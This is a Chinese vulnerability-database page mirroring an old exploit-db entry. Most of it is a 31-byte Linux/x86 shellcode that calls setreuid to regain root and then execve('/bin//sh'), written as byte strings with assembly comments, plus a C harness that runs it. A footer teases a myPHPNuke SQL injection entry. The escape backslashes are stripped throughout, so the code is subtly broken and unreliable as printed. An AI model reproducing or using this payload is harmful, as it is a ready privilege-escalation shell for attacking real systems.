Linux/x86 – setreuid() + execve() Shellcode (31 bytes)-安全小百科

Linux/x86 – setreuid() + execve() Shellcode (31 bytes)

漏洞ID	1054847	漏洞类型
发布时间	2004-12-26	更新时间	2004-12-26
CVE编号	N/A	CNNVD-ID	N/A
漏洞平台	Linux_x86	CVSS评分	N/A

|漏洞来源

https://www.exploit-db.com/exploits/13417

|漏洞详情

漏洞细节尚未披露

|漏洞EXP

/* 31 byte setreuid() shellcode - # man shadow
* os: Slackware 9.1, Phlak 2.4, Knoppix 0.1
*
* www.manshadow.org
* [email protected]
* irc.efnet.net #_man_shadow
*/

char shellcode[] =
"x31xC9"              /* xor ecx,ecx     */
"x31xDB"              /* xor ebx,ebx     */
"x6Ax46"              /* push byte 70    */
"x58"                  /* pop eax         */
"xCDx80"              /* int 80h         */
"x51"                  /* push ecx        */
"x68x2Fx2Fx73x68"  /* push 0x68732F2F */
"x68x2Fx62x69x6E"  /* push 0x6E69622F */
"x89xE3"              /* mov ebx,esp     */
"x51"                  /* push ecx        */
"x53"                  /* push ebx        */
"x89xE1"              /* mov ecx,esp     */
"x99"                  /* cdq             */
"xB0x0B"              /* mov al,11       */
"xCDx80";             /* int 80h         */

int main(int argc, char *argv[]) {
       void (*sc)() = (void *)shellcode;
       printf("len:%dn", strlen(shellcode));
       sc();
       return 0;
}

// milw0rm.com [2004-12-26]

相关推荐: myPHPNuke 1.8.8 – ‘auth.inc.php’ SQL Injection

myPHPNuke 1.8.8 – ‘auth.inc.php’ SQL Injection 漏洞ID 1054176 漏洞类型发布时间 2003-09-20 更新时间 2003-09-20 CVE编号 N/A CNNVD-ID N/A 漏洞平台 PHP C…

文章版权归作者所有，未经允许请勿转载。

THE END